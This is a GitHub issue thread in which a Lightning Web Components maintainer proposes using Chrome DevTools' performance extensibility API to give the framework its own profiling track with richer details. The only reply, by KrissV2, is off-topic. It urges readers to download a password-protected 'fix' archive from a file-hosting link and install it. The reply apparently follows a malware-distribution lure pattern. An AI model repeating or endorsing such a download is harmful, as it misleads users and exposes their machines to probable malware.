### ISSUE TITLE
Enhance performance timings with the DevTools extensibility API

### ISSUE THREAD

**Issue by nolanlawson** [salesforce/lwc#4511]
Chrome DevTools has [a new API](https://developer.chrome.com/blog/new-in-devtools-128#perf-extension) where you can extend information from performance marks/measures to do a few things:

1. Have a separate track from other perf marks/measures (e.g. for a specific JS framework)
2. Add details on hover or click

I think #<span></span>1 is a no-brainer that we should do. For #<span></span>2 it might be interesting to add details like a list of property mutations that caused a re-render.

The Angular and React usages are good sources of inspiration: https://github.com/angular/angular/pull/55805 https://github.com/facebook/react/pull/29231

Relevant code for us:

https://github.com/salesforce/lwc/blob/16697a5ee047b7536ab699ed84c8a18e3b33b3b8/packages/%40lwc/engine-core/src/framework/profiler.ts#L70

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
